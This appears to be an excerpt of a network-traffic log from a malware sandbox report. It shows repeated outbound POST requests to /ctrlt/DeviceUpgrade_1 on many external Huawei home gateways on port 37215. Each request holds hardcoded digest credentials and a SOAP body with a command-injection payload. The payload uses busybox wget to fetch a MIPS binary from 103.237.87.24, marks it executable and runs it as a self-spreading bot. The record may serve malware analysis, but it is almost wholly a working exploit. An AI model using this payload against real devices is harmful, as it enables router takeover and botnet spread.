                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1841192.168.2.133830434.168.52.2237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546385050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1842192.168.2.1339440197.127.2.21537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546483040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1843192.168.2.1352962151.164.71.1337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546925068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1844192.168.2.134509441.75.107.20937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546958923 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1845192.168.2.1334120161.230.56.18037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.546982050 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1846192.168.2.133547441.91.25.20737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547029972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1847192.168.2.1348274157.164.202.15437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547036886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1848192.168.2.135160241.136.103.7837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547066927 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1849192.168.2.1359090157.82.234.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547095060 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1850192.168.2.133694241.221.232.22237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:04.547168016 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
